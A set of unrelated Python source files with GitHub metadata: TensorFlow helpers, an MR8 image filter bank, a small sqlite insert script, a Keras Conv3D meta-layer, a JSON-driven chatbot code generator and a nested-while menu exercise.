a401716579994e1c9f7e98b968725c0421e3183f | 2e072e0ebc25dda2548a097e3ed70ea378b7b3c5 | /models/primitives.py | fec84fc69b48c939e4246953fab00b4a96e84088 | [] | no_license | YuliaRubanova/mutation_prediction | 5f6341b14f8968de8b43d9fdd936de20136962f2 | d7e7348d21c33fa7273897ece030fe8323cc3740 | refs/heads/master | 2021-05-08T06:29:53.728118 | 2018-03-03T21:06:59 | 2018-03-03T21:06:59 | 106,626,293 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,780 | py | import tensorflow as tf
import tempfile
import numpy as np
def deepnn(x):
"""deepnn builds the graph for a deep net for classifying digits.
Args:
x: an input tensor with the dimensions (N_examples, 784), where 784 is the
number of pixels in a standard MNIST image.
Returns:
A tuple (y, keep_prob). y is a tensor of shape (N_examples, 10), with values
equal to the logits of classifying the digit into one of 10 classes (the
digits 0-9). keep_prob is a scalar placeholder for the probability of
dropout.
"""
# Reshape to use within a convolutional neural net.
# Last dimension is for "features" - there is only one here, since images are
# grayscale -- it would be 3 for an RGB image, 4 for RGBA, etc.
with tf.name_scope('reshape'):
x_image = tf.reshape(x, [-1, 344, 9, 1])
# First convolutional layer - maps one grayscale image to 32 feature maps.
with tf.name_scope('conv1'):
W_conv1 = weight_variable([5, 5, 1, 32])
b_conv1 = bias_variable([32])
h_conv1 = tf.nn.relu(conv2d(x_image, W_conv1) + b_conv1)
# Pooling layer - downsamples by 2X.
with tf.name_scope('pool1'):
h_pool1 = max_pool_2x2(h_conv1)
# Second convolutional layer -- maps 32 feature maps to 64.
with tf.name_scope('conv2'):
W_conv2 = weight_variable([5, 5, 32, 64])
b_conv2 = bias_variable([64])
h_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2) + b_conv2)
# Second pooling layer.
with tf.name_scope('pool2'):
h_pool2 = max_pool_2x2(h_conv2)
# Fully connected layer 1 -- after 2 round of downsampling, our 28x28 image
# is down to 7x7x64 feature maps -- maps this to 1024 features.
with tf.name_scope('fc1'):
W_fc1 = weight_variable([16512, 1024])
b_fc1 = bias_variable([1024])
h_pool2_flat = tf.reshape(h_pool2, [-1, 16512])
h_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1)
# Dropout - controls the complexity of the model, prevents co-adaptation of
# features.
with tf.name_scope('dropout'):
keep_prob = tf.placeholder(tf.float32)
h_fc1_drop = tf.nn.dropout(h_fc1, keep_prob)
# Map the 1024 features to 10 classes, one for each digit
with tf.name_scope('fc2'):
W_fc2 = weight_variable([1024, 1])
b_fc2 = bias_variable([1])
y_conv = tf.matmul(h_fc1_drop, W_fc2) + b_fc2
return y_conv, keep_prob
def conv2d(x, W):
"""conv2d returns a 2d convolution layer with full stride."""
return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')
def max_pool_2x2(x):
"""max_pool_2x2 downsamples a feature map by 2X."""
return tf.nn.max_pool(x, ksize=[1, 2, 2, 1],
strides=[1, 2, 2, 1], padding='SAME')
def weight_variable(shape, mean = 0.0, stddev=0.1):
"""weight_variable generates a weight variable of a given shape."""
initial = tf.truncated_normal(shape, mean = mean, stddev=stddev)
return tf.Variable(initial)
def bias_variable(shape, value=0.1):
"""bias_variable generates a bias variable of a given shape."""
initial = tf.constant(value, shape=shape)
return tf.Variable(initial)
def unpack_gaussian(x, dim):
return x[:,:dim], x[:,dim:]
def get_batch(data_list, batch_size, i):
return [data[i*batch_size:(i+1)*batch_size] for data in data_list]
def save_graph():
graph_location = tempfile.mkdtemp()
print('Saving graph to: %s' % graph_location)
train_writer = tf.summary.FileWriter(graph_location)
train_writer.add_graph(tf.get_default_graph())
def init_neural_net_params(layer_sizes, stddev = 0.1, bias = 0.1):
"""Build a list of (weights, biases) tuples,
one for each layer in the net."""
weights = []
biases = []
for i, (m, n) in enumerate(list(zip(layer_sizes[:-1], layer_sizes[1:]))):
print((m,n))
weights.append(weight_variable([m, n], stddev = stddev))
biases.append(bias_variable([n], value = bias))
return {'weights': weights, 'biases': biases}
def neural_net(data, weights, biases):
x = data
for w,b in list(zip(weights, biases))[:-1]:
x = tf.nn.relu(tf.matmul(x, w) + b)
#x = tf.tanh(tf.matmul(x, w) + b)
output = tf.matmul(x, weights[-1]) + biases[-1]
return output
def correct_predictions(predictions, y_):
predictions_binary = tf.cast(tf.less(tf.constant(0.5), predictions),tf.int64) # gaussian
correct_prediction = tf.equal(predictions_binary, tf.cast(y_,tf.int64))
correct_prediction = tf.cast(correct_prediction, tf.float32)
return correct_prediction
def correct_predictions_multiclass(predictions, y_):
correct_prediction = tf.equal(tf.argmax(predictions, axis=1), tf.argmax(y_, axis=1))
correct_prediction = tf.cast(correct_prediction, tf.float32)
return correct_prediction
def mean_squared_error(truth, predicted):
return tf.sqrt(tf.reduce_mean(tf.square(truth - predicted)))
def evaluate_on_each_tumour(x_data, tumours_data, time_estimates_data, tf_vars, metric):
x, tumour_id, time_estimates, time_series_lengths, sequences_per_batch_tf, predictions = tf_vars
evaluated_metric = 0
n_tumour_batches = x_data.shape[0]
for tumour_data, tid, time in zip(x_data, tumours_data, time_estimates_data):
tumour_dict = {x: tumour_data, tumour_id: np.array(tid).astype(int)[:,np.newaxis],
time_estimates: time,
time_series_lengths: np.squeeze(np.apply_along_axis(sum, 1, time_estimates_data > 0), axis=0),
sequences_per_batch_tf: tumour_data.shape[1]}
evaluated_metric += metric.eval(feed_dict=tumour_dict) / n_tumour_batches
return evaluated_metric
def collect_on_each_tumour(x_data, tumours_data, time_estimates_data, tf_vars, metric):
x, tumour_id, time_estimates, time_series_lengths, sequences_per_batch_tf, predictions = tf_vars
evaluated_metric = []
n_tumour_batches = x_data.shape[0]
for tumour_data, tid, time in zip(x_data, tumours_data, time_estimates_data):
tumour_dict = {x: tumour_data, tumour_id: np.array(tid).astype(int)[:,np.newaxis],
time_estimates: time,
time_series_lengths: np.squeeze(np.apply_along_axis(sum, 1, time_estimates_data > 0), axis=0),
sequences_per_batch_tf: tumour_data.shape[1]}
evaluated_metric.append(metric.eval(feed_dict=tumour_dict))
return evaluated_metric
def compute_mut_type_prob(truth, n_mut_types, predicted_mut_types, vaf=None, time_series_lengths=None):
mut_types = tf.transpose(truth[:,:,:n_mut_types], perm = [1,0,2])
dist = tf.contrib.distributions.Multinomial(total_count=tf.reduce_sum(mut_types,axis=2), logits=predicted_mut_types, validate_args = True)
type_prob = tf.expand_dims(dist.log_prob(mut_types), 1)
if vaf is not None:
type_prob = tf.multiply(type_prob, tf.to_float(tf.greater((vaf),tf.constant(0.0))))
type_prob = tf.divide(type_prob, (time_series_lengths - 1))
return type_prob
def kl_divergence(p,q):
kl = p * tf.log( p / q)
return kl
| [
"julia_erise@mail.ru"
] | julia_erise@mail.ru |
3e5bb2da81c38b22767d8afd2e83e828dff49772 | 8ba33fabe2760b66256a0ae66e3983b83dc63a4d | /mr8.py | e4700d4f9bf00ff217e26effecd23fa09fea311f | [
"MIT"
] | permissive | AdilBaaj/Fisher-Vectors | a06eea868aac87af0ffd34f6bd7b2337b333b684 | b948c220896e438e34d68d29f5e38fd7bb28290e | refs/heads/master | 2021-05-05T00:58:34.553875 | 2016-08-09T11:10:06 | 2016-08-09T11:10:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,613 | py | #!/usr/bin/env python
'''
Utility to generate MR8 Filter Bank
'''
__author='Ameya Joshi'
__email = 'ameya@sigtuple.com'
from skimage import filters
import numpy as np
import scipy as sp
from matplotlib import pyplot as plt
import pickle as pkl
import numpy as np
import matplotlib.pyplot as plt
from itertools import product, chain
from scipy.misc import face
#from sklearn.externals.joblib import Parallel, delayed
class MR8_FilterBank():
    """Builds the RFS (Root Filter Set) bank and computes MR8 responses.

    The bank consists of edge and bar filters at several scales and
    orientations plus two rotation-invariant filters (a Gaussian and a
    Laplacian-of-Gaussian-like second derivative).
    """

    def __init__(self, sigma=None, n_orientations=6):
        # BUG FIX: the original signature lacked ``self`` (the instance was
        # silently bound to ``sigma``) and used a mutable default list.
        # The stored values are not used by the filter builders (which take
        # their own arguments); they are kept for interface compatibility.
        self.sigma = [1, 2, 4] if sigma is None else sigma
        self.n_orientations = n_orientations

    def make_gaussian_filter(self, x, sigma, order=0):
        """Return a 1-D Gaussian (or its 1st/2nd derivative) sampled at ``x``.

        The response is L1-normalized.  Only derivative orders 0..2 are
        supported; higher orders raise ValueError.
        """
        if order > 2:
            raise ValueError("Only orders up to 2 are supported")
        # compute unnormalized Gaussian response
        response = np.exp(-x ** 2 / (2. * sigma ** 2))
        if order == 1:
            response = -response * x
        elif order == 2:
            response = response * (x ** 2 - sigma ** 2)
        # normalize (L1) so every filter has unit absolute mass
        response /= np.abs(response).sum()
        return response

    def makefilter(self, scale, phasey, pts, sup):
        """Build one separable (sup x sup) filter: smooth along x, derivative
        of order ``phasey`` along y, evaluated at the rotated points ``pts``."""
        gx = self.make_gaussian_filter(pts[0, :], sigma=3 * scale)
        gy = self.make_gaussian_filter(pts[1, :], sigma=scale, order=phasey)
        f = (gx * gy).reshape(sup, sup)
        # normalize
        f /= np.abs(f).sum()
        return f

    def makeRFSfilters(self, radius=24, sigmas=(1, 2, 4), n_orientations=6):
        """ Generates filters for RFS filterbank.
        Parameters
        ----------
        radius : int, default 24
            radius of all filters. Size will be 2 * radius + 1
        sigmas : sequence of floats, default (1, 2, 4)
            define scales on which the filters will be computed
        n_orientations : int
            number of fractions the half-angle will be divided in
        Returns
        -------
        edge : ndarray (len(sigmas), n_orientations, 2*radius+1, 2*radius+1)
            Contains edge filters on different scales and orientations
        bar : ndarray (len(sigmas), n_orientations, 2*radius+1, 2*radius+1)
            Contains bar filters on different scales and orientations
        rot : ndarray (2, 1, 2*radius+1, 2*radius+1)
            contains two rotation invariant filters, Gaussian and Laplacian of
            Gaussian
        """
        support = 2 * radius + 1
        x, y = np.mgrid[-radius:radius + 1, radius:-radius - 1:-1]
        orgpts = np.vstack([x.ravel(), y.ravel()])
        rot, edge, bar = [], [], []
        for sigma in sigmas:
            for orient in range(n_orientations):  # range: Py2 and Py3 (was xrange)
                # Not 2pi as filters have symmetry
                angle = np.pi * orient / n_orientations
                c, s = np.cos(angle), np.sin(angle)
                rotpts = np.dot(np.array([[c, -s], [s, c]]), orgpts)
                edge.append(self.makefilter(sigma, 1, rotpts, support))
                bar.append(self.makefilter(sigma, 2, rotpts, support))
        # The two rotation-invariant filters are scale-independent (sigma=10).
        length = np.sqrt(x ** 2 + y ** 2)
        rot.append(self.make_gaussian_filter(length, sigma=10))
        rot.append(self.make_gaussian_filter(length, sigma=10, order=2))
        # reshape flat filter lists into (scale, orientation, h, w) stacks
        edge = np.asarray(edge).reshape(len(sigmas), n_orientations, support, support)
        bar = np.asarray(bar).reshape(edge.shape)
        rot = np.asarray(rot)[:, np.newaxis, :, :]
        return edge, bar, rot

    def apply_filterbank(self, img, filterbank):
        """Convolve ``img`` with every battery in ``filterbank`` and keep, per
        battery, the pixelwise maximum response (the MR8 reduction)."""
        from scipy.ndimage import convolve
        result = []
        for battery in filterbank:
            response = [convolve(img, filt, mode='reflect') for filt in battery]
            max_response = np.max(response, axis=0)
            result.append(max_response)
            print("battery finished")
        return result
# Demo entry point: build the RFS bank, visualize every filter, then apply
# the MR8 reduction to a sample image and plot the eight responses.
# NOTE(review): Python 2 era code — uses ``xrange`` and ``np.float`` (removed
# in NumPy >= 1.24) and ``scipy.misc.face`` (moved out of scipy.misc).
if __name__ == "__main__":
    sigmas = [1, 2, 4]
    n_sigmas = len(sigmas)
    n_orientations = 6
    mr8 = MR8_FilterBank()
    edge, bar, rot = mr8.makeRFSfilters(sigmas=sigmas,
                                        n_orientations=n_orientations)
    n = n_sigmas * n_orientations
    # plot filters
    # 2 is for bar / edge, + 1 for rot
    fig, ax = plt.subplots(n_sigmas * 2 + 1, n_orientations)
    for k, filters in enumerate([bar, edge]):
        # one subplot row per (filter family, scale) pair
        for i, j in product(xrange(n_sigmas), xrange(n_orientations)):
            row = i + k * n_sigmas
            ax[row, j].imshow(filters[i, j, :, :], cmap=plt.cm.gray)
            ax[row, j].set_xticks(())
            ax[row, j].set_yticks(())
    # bottom row: the two rotation-invariant filters, remaining axes hidden
    ax[-1, 0].imshow(rot[0, 0], cmap=plt.cm.gray)
    ax[-1, 0].set_xticks(())
    ax[-1, 0].set_yticks(())
    ax[-1, 1].imshow(rot[1, 0], cmap=plt.cm.gray)
    ax[-1, 1].set_xticks(())
    ax[-1, 1].set_yticks(())
    for i in xrange(2, n_orientations):
        ax[-1, i].set_visible(False)
    # apply filters to lena
    img = face(gray=True).astype(np.float)
    print(img.shape)
    filterbank = chain(edge, bar, rot)
    n_filters = len(edge) + len(bar) + len(rot)
    print('[applying]:%d'%n_filters)
    response = mr8.apply_filterbank(img, filterbank)
    # plot responses
    fig2, ax2 = plt.subplots(3, 3)
    for axes, res in zip(ax2.ravel(), response):
        axes.imshow(res, cmap=plt.cm.gray)
        axes.set_xticks(())
        axes.set_yticks(())
    ax2[-1, -1].set_visible(False)
    plt.show()
| [
"ameya@sigtuple.com"
] | ameya@sigtuple.com |
74ddb7055e05ca9419e736b7f3c2b526625a7f53 | a03b076528ef50b95e906b32097865de607a4578 | /automate3.py | b411b61930652edebec100ee181635b0a0091e53 | [] | no_license | Hiroaki0422/WebScraper-db | 7dc306d6adaad035993375e6457af993f5b1051e | 0bd470c4c156627205bd834cd96c3008dfc1c466 | refs/heads/master | 2020-04-07T06:36:04.416831 | 2018-11-19T01:13:41 | 2018-11-19T01:13:41 | 158,142,675 | 0 | 0 | null | 2018-11-19T00:57:08 | 2018-11-19T00:57:08 | null | UTF-8 | Python | false | false | 325 | py | import sqlite3
conn = sqlite3.connect('automa_job.db')
mydb = conn.cursor()
mydb.execute(''' CREATE TABLE jobs
(title text, company text, link text, term text)''')
mydb.execute("INSERT INTO jobs VALUES ('semi-professional waffle cosplayer','Office of Carol Christ','pornhub.com','20XX-20YY')")
conn.commit()
conn.close() | [
"kifa0422@gmail.com"
] | kifa0422@gmail.com |
dff0eb2acf4da0a475156ff795a327f9c89bcde3 | a5ada23f0c9d429cd7afa2351368e46bc23255e4 | /meta_models/meta_layers/conv3d_meta_layer.py | b3542d2d43a0dafcd10873c1e253f60dafba31d8 | [
"MIT"
] | permissive | AnacletoLAB/meta_models | ef6df0205f88832897e7ebdcd8057635b90024a9 | 9c70eb0bf080f0ec4bd24b7764f0f71d92d467d5 | refs/heads/master | 2023-04-11T14:01:47.678710 | 2021-04-27T08:25:53 | 2021-04-27T08:25:53 | 286,005,232 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,515 | py | """Class implementing meta-model for a Conv3D Layer."""
from typing import Dict
from tensorflow.keras.layers import (Activation, BatchNormalization, Conv3D,
Layer)
from .regularized_meta_layer import RegularizedMetaLayer
from ..utils import distributions
class Conv3DMetaLayer(RegularizedMetaLayer):
    """Class implementing meta-layer for tri-dimensional convolutional layers.

    A "meta-layer" describes a tunable search space (``_space``) and knows how
    to materialize a concrete Keras block (``_build``) for a sampled point of
    that space.  Regularization and batch-normalization behaviour come from
    the parent ``RegularizedMetaLayer``.

    Private members
    ------------------------
    _min_filters: int,
        Minimum number of filters to use for the layer.
    _max_filters: int,
        Maximum number of filters to use for the layer.
    _min_x_kernel_size: int,
        Minimum size of the kernel on the length axis.
    _max_x_kernel_size: int,
        Maximum size of the kernel on the length axis.
    _min_y_kernel_size: int,
        Minimum size of the kernel on the depth axis.
    _max_y_kernel_size: int,
        Maximum size of the kernel on the depth axis.
    _min_z_kernel_size: int,
        Minimum size of the kernel on the height axis.
    _max_z_kernel_size: int,
        Maximum size of the kernel on the height axis.
    _activation: str,
        The activation function to use for the layer.
    """

    def __init__(
        self,
        min_filters: int = 0,
        max_filters: int = 256,
        min_x_kernel_size: int = 1,
        max_x_kernel_size: int = 5,
        min_y_kernel_size: int = 1,
        max_y_kernel_size: int = 5,
        min_z_kernel_size: int = 1,
        max_z_kernel_size: int = 5,
        activation: str = "relu",
        **kwargs: Dict
    ):
        """Create new Conv3DResidualLayer meta-model object.

        Parameters
        ----------------------
        min_filters: int = 0,
            Minimum number of filters (neurons) in each layer.
            If the tuning process passes 0, then the layer is skipped.
        max_filters: int = 256,
            Maximum number of filters (neurons) in each layer.
        min_x_kernel_size: int = 1,
            Minimum size of the kernel on the length axis.
        max_x_kernel_size: int = 5,
            Maximum size of the kernel on the length axis.
        min_y_kernel_size: int = 1,
            Minimum size of the kernel on the depth axis.
        max_y_kernel_size: int = 5,
            Maximum size of the kernel on the depth axis.
        min_z_kernel_size: int = 1,
            Minimum size of the kernel on the height axis.
        max_z_kernel_size: int = 5,
            Maximum size of the kernel on the height axis.
        activation: str = "relu",
            The activation function to use for the layer.
        **kwargs: Dict,
            Dictionary of keyword parameters to be passed to parent class.
        """
        super().__init__(**kwargs)
        self._min_filters = min_filters
        self._max_filters = max_filters
        self._min_x_kernel_size = min_x_kernel_size
        self._max_x_kernel_size = max_x_kernel_size
        self._min_y_kernel_size = min_y_kernel_size
        self._max_y_kernel_size = max_y_kernel_size
        self._min_z_kernel_size = min_z_kernel_size
        self._max_z_kernel_size = max_z_kernel_size
        self._activation = activation

    def _space(self) -> Dict:
        """Return hyper parameters of the layer.

        Each entry maps a parameter name to a (distribution, low, high)
        triple; parent-class parameters are merged in via ``super()._space()``.
        """
        return {
            "filters": (distributions.integer, self._min_filters, self._max_filters),
            "x_kernel_size": (distributions.integer, self._min_x_kernel_size, self._max_x_kernel_size),
            "y_kernel_size": (distributions.integer, self._min_y_kernel_size, self._max_y_kernel_size),
            "z_kernel_size": (distributions.integer, self._min_z_kernel_size, self._max_z_kernel_size),
            **super()._space()
        }

    def _build(
        self,
        input_layers: Layer,
        filters: int,
        x_kernel_size: int,
        y_kernel_size: int,
        z_kernel_size: int,
        strides: int = (1, 1, 1),
        **kwargs: Dict
    ) -> Layer:
        """Return built Conv3D layer block.

        If the given filters number is equal to 0, the layer is skipped.

        Parameters
        --------------------------
        input_layers: Layer,
            The input layer of the current layer.
        filters: int,
            The number of neurons of the layer.
        x_kernel_size: int,
            The dimension of the kernel for the layer, on the length axis.
        y_kernel_size: int,
            The dimension of the kernel for the layer, on the depth axis.
        z_kernel_size: int,
            The dimension of the kernel for the layer, on the height axis.
        strides: int = (1, 1, 1),
            Strides for the convolutional layer.
        **kwargs: Dict,
            The kwargs to pass to the kernel regularizers.

        Returns
        --------------------------
        Output layer of the block.
        """
        # Sampled hyper-parameters may arrive as floats; snap them to ints.
        filters = round(filters)
        x_kernel_size = round(x_kernel_size)
        y_kernel_size = round(y_kernel_size)
        z_kernel_size = round(z_kernel_size)
        # Zero filters is the sentinel for "drop this layer entirely".
        if filters == 0:
            return input_layers
        layer = Conv3D(
            filters=filters,
            kernel_size=(x_kernel_size, y_kernel_size, z_kernel_size),
            strides=strides,
            padding="same",
            **self._build_regularizers(**kwargs)
        )(input_layers)
        # _batch_normalization is configured on the parent class.
        if self._batch_normalization:
            layer = BatchNormalization()(layer)
        activation = Activation(self._activation)(layer)
        return activation
| [
"cappelletti.luca94@gmail.com"
] | cappelletti.luca94@gmail.com |
b4fb01470f103a8299e89e3f93c3972b0997a026 | e04d618fa665dfadadb221a6803dd3531b08145c | /bot.py | f87458a69d7639c626bdc9f4bddb1d60131bb424 | [] | no_license | vivonk/assesment-submission | 321d63ff01f4d41850eafdc37a715b0f72440487 | 038f8181573bff126102c522d670c3fdb70e8bc1 | refs/heads/master | 2020-04-02T01:39:20.096184 | 2018-10-20T20:13:41 | 2018-10-20T20:13:41 | 153,867,822 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,883 | py | import json
import sys
# Fragments of Python source used when emitting the generated bot script.
function_def_head = '\ndef '         # start of a generated function definition
bracket_without_params = '():'       # parameter-less signature terminator
for_base_syntax = 'for i in range('  # opening of a generated counting loop
def input_formatter(input_text):
    """Render a raw_input(...) call that prompts with ``input_text``."""
    return 'raw_input("{0}")'.format(input_text)
def generate_for_loop(print_obj, list_len):
    """Emit a for-loop that prints ``print_obj`` ``list_len`` times."""
    header = for_base_syntax + list_len + '):'
    body = print_something(print_obj, False)
    return header + double_new_line() + body + new_line()
def generate_for_loop_with_format(print_obj, var, list_len):
    """Emit a for-loop printing a %-formatted ``print_obj`` with ``var`` args."""
    header = for_base_syntax + list_len + '):'
    body = print_something_with_format(print_obj, var, False)
    return header + double_new_line() + body
def print_something(print_obj, is_list_length, list_len=0):
    """Emit a print statement, or a loop of prints when a positive list
    length is supplied together with ``is_list_length``."""
    if not (is_list_length and list_len > 0):
        return 'print("{0}")'.format(print_obj)
    return generate_for_loop(print_obj, list_len)
def print_something_with_format(print_obj, var, is_list_length, list_len=0):
    """Emit a %-formatted print statement; with a positive list length,
    wrap it in a generated for-loop instead."""
    if is_list_length and list_len > 0:
        return generate_for_loop_with_format(print_obj, var, list_len)
    # At least one variable is required (mirrors the original IndexError).
    arg_list = ', '.join(list(var[:-1]) + [var[-1]])
    return 'print( "{0}" % ({1}) )'.format(print_obj, arg_list)
def get_input_writer(var, msg):
    """Emit an assignment that reads user input into ``var``."""
    return '{0} = {1}'.format(var, input_formatter(msg))
def get_input_writer_with_option(var, msg, options):
    """Emit an input assignment whose prompt appends '( a/b/... )' listing
    the allowed ``options``."""
    # At least one option is required (mirrors the original IndexError).
    option_string = '( ' + '/'.join(list(options[:-1]) + [options[-1]]) + ' )'
    return var + ' = ' + input_formatter(msg + option_string)
def new_line():
    """Newline followed by a single indent level (one tab)."""
    return '\n' + '\t'
def double_new_line():
    """Newline followed by two indent levels (despite the name, one newline)."""
    return '\n' + '\t' * 2
def write_conditions(var, msg, conditions):
    """Emit a while-loop that keeps re-prompting ``var`` while the guard holds.

    ``conditions`` is a list of AND-groups (lists of condition strings);
    the groups themselves are OR-ed together in the generated guard.
    """
    or_parts = []
    for and_group in conditions:
        and_clause = ' and '.join('( ' + cond + ' )' for cond in and_group)
        or_parts.append('( ' + and_clause + ' )')
    statement = 'while ' + ' or'.join(or_parts)
    statement += ':' + double_new_line()
    statement += get_input_writer(var, msg) + new_line()
    return statement
def write_formula(var, formula):
    """Emit an assignment of ``formula`` to ``var`` plus trailing indentation."""
    return '{0} = {1}'.format(var, formula) + new_line()
def write_bot_backend_from_rules(rules_in_json):
    """Append a generated handler function to backend/handler.py.

    ``rules_in_json`` carries a 'function' name and a list of 'questions';
    each question dict is translated into generated Python source: prints,
    input assignments, while-guard re-prompts or formula assignments,
    dispatched on which keys the rule contains.
    NOTE(review): Python 2 only (``dict.iteritems`` below).
    """
    backend_file_path = 'backend/handler.py'
    with open(backend_file_path, 'a') as file_writer:
        # Generated function header, e.g. "\ndef <name>():".
        file_writer.write(function_def_head + '' + rules_in_json['function'] + bracket_without_params + new_line())
        file_writer.write('response = {}' + new_line() +
                          'calc_stage = 0' + new_line())  # creating dict for saving response series
        for rule in rules_in_json['questions']:
            print(rule)
            # local variables to identify the rule type
            is_instruction = False
            is_condition = False
            is_text = False
            is_options = False
            is_instruction_var = False
            is_formula = False
            is_list_length = False
            # Flag every key this rule carries; the branch order below
            # decides which single emitter runs for the rule.
            for r_name, r_value in rule.iteritems():
                if r_name == 'instruction':
                    is_instruction = True
                if r_name == 'conditions':
                    is_condition = True
                if r_name == 'text':
                    is_text = True
                if r_name == 'options':
                    is_options = True
                if r_name == 'instruction_var':
                    is_instruction_var = True
                if r_name == 'formula':
                    is_formula = True
                if r_name == 'list_length':
                    is_list_length = True
            if is_instruction:
                list_length = 0
                if is_list_length:
                    list_length = rule['list_length']
                if is_instruction_var:
                    # %-formatted instruction, optionally looped list_length times.
                    file_writer.write(print_something_with_format(rule['instruction'], rule['instruction_var'],
                                                                  is_list_length, list_len=list_length)
                                      + new_line())
                else:
                    file_writer.write(print_something(rule['instruction'], is_list_length, list_len=list_length)
                                      + new_line())
                continue
            elif is_condition:
                # Re-prompt loop guarded by the rule's condition groups.
                file_writer.write(write_conditions(rule['var'], rule['text'], rule['conditions']))
                continue
            elif is_text and is_options:
                # Prompt offering a fixed set of options.
                file_writer.write(get_input_writer_with_option(rule['var'], rule['text'], rule['options'])
                                  + new_line())
                continue
            elif is_text:
                file_writer.write(get_input_writer(rule['var'], rule['text']) + new_line())
                continue
            elif is_formula:
                file_writer.write(write_formula(rule['var'], rule['formula']))
        file_writer.write('\n')  # ending file
        file_writer.close()  # redundant under "with"; kept as in original
if __name__ == '__main__':
    # Usage: python bot.py <rules.json>
    file_path = sys.argv[1]  # considering relative path
    with open(file_path, 'r') as r_file:
        rules = json.loads(r_file.read())
        r_file.close()  # redundant under "with"; kept as in original
    write_bot_backend_from_rules(rules)
| [
"nirmalsarswat400@gmail.com"
] | nirmalsarswat400@gmail.com |
d2f015b935dcc34b97c3b8b90fcc2535d339ab30 | f80e5d24b6a3d4dff69ea92f067b67b18ee09540 | /project/core/tags/models.py | 46df645d98f3c44eb7bc88f292aad4b5b6d2e16e | [] | no_license | ZAS-Store/school | 94b2898d5d9454aa52f7a679cb5b213511a66593 | 61809f90161f084f6a520d1fa41c3dd562980f83 | refs/heads/master | 2021-08-07T17:04:56.721457 | 2017-11-08T15:45:17 | 2017-11-08T15:45:17 | 109,995,242 | 1 | 0 | null | 2017-11-08T15:41:27 | 2017-11-08T15:41:27 | null | UTF-8 | Python | false | false | 265 | py | from django.db import models
from core.models import BaseModel
from django.utils.translation import ugettext_lazy as _
class Tag (BaseModel):
    """A reusable tag label; common fields are inherited from BaseModel."""
    # Human-readable tag text, shown verbatim wherever the tag is rendered.
    title = models.CharField(max_length=40, verbose_name=_('title'))

    def __unicode__(self):
        # Python 2 string representation (this code base predates __str__).
        return self.title
"relekang@gmail.com"
] | relekang@gmail.com |
7acf321b627548740ec489d42fa54289135a8065 | e660317c6e46912ac0b6c2362ca97aaf418ce2e7 | /once_on_a_time/ooat/serializers.py | f8f0938d5ea6c126d3ce2c79a80bd67dc9f9a95b | [] | no_license | onceonatime/backend | 3a35d1171f0e1765d430598e60eed3e53f8473d3 | ad5cbfe4b4d85e5f5781946cc5aeb3b205120bf3 | refs/heads/master | 2022-04-30T04:31:27.959090 | 2019-07-12T05:01:23 | 2019-07-12T05:01:23 | 195,342,803 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 307 | py | from rest_framework import serializers
from .models import Datas
class DatasSerializer(serializers.ModelSerializer):
    """DRF serializer exposing the heritage-site fields of the Datas model.

    NOTE(review): the field codes (ccbaKdcd, ccbaAsno, ...) look like Korean
    Cultural Heritage open-API identifiers — confirm against the data source.
    """
    class Meta:
        model=Datas
        fields = ('ccbaKdcd','ccbaAsno','ccbaCtcd','ccbaPcd1','ccbaMnm1','ccbaMnm2','ccmaName','ccbaCtcdNm','ccsiName','longitude','latitude','content')
"giyeon0312@gmail.com"
] | giyeon0312@gmail.com |
19a21ee52daecddd0c86aa200f154fb3a8ffcb6b | 68a1b4a74beec2876da6b0375221f85f0bb47ba6 | /Training/Nested While - Menu.py | 9556bce6a59a281aaa294982e16c432815406e70 | [] | no_license | rsthecoder/Python | c8f42d4fe1df524eb1c0454639532e15e8b1c4ca | 4e69a2eafa10288eba8a7869d3563d7ba8b358c9 | refs/heads/main | 2021-06-28T08:24:36.665301 | 2021-03-21T17:35:46 | 2021-03-21T17:35:46 | 226,655,714 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,512 | py | """
first = True
second = False
while first == True:
print('this is the first level')
level = input('choose level:\t')
if level == "second":
print('going down to second level')
first = False
second = True
while second == True:
print('this is second level')
level = input('choose level:\t')
if level == 'first':
print('going up to first level')
first = True
second = False """
# Two nested menu loops driven by free-text input: the outer loop is the
# "first level"; typing "second" enters the inner loop, which stays on the
# second level until "first" is typed again.  Any other input falls back to
# the outer prompt.
while True:
    print("This is the first level")
    level = input("choose level:\t ")
    while True:
        if level == "second":
            print("this is second level")
            level = input("choose level:\t")
            if level == "first":
                print('going up to first level')
                break  # leave the second level, back to the outer prompt
            continue  # stay on the second level for any other input
        break  # input was not "second": return to the outer prompt
"""
while True:
try:
secenekler =
Merhaba programin GIRIS ekranindasiniz:
Ogrenci eklemek icin 1 yazip entera basiniz
Ders notu girmek icin 2 yazip entera basiniz
print(secenekler)
ilk_secim = int(input("Lutfen seciminizi yapiniz: "))
while True:
if ilk_secim == 1:
print("Ogrenci ekleme ekranina hos geldiniz!")
print("1- Yeni ogrenci ekle 2- Bir ust menuye don")
ikinci_secim = int(input("Lutfen seciminizi yapiniz: "))
if ikinci_secim == 1:
print("Yeni ogrenci ekleme menusu")
break
if ikinci_secim == 2:
print("Giris ekranina geri donuluyor.")
break
if ilk_secim == 2:
print("Ders notu girme ekranina hos geldiniz!")
print("1- Final notu gir 2- Bir ust menuye don")
ikinci_secim = int(input("Lutfen seciminizi yapiniz: "))
if ikinci_secim == 1:
print("Final notu ekleme menusu")
break
if ikinci_secim == 2:
print("Giris ekranina geri donuluyor.")
break
else:
print("Yanlis secim yaptiniz tekrar deneyiniz!")
break
except:
print("Hatali giris yaptiniz! Tekrar deneyiniz!")
"""
""" first = True
second = True
while first == True:
print("First While - Main Menu")
second = True
while second == True: # Her turlu buradaki While dongusune girecek
print("Second While - Main Menu")
secim = int(input("enter 2 to main menu"))
if secim == 2:
print(str(secim) + " secenegi ile main menuye gecis yapiliyor!" )
second = False
print("ikinci while dongusu sonlandi")
input() """
| [
"ramazansakrs@gmail.com"
] | ramazansakrs@gmail.com |
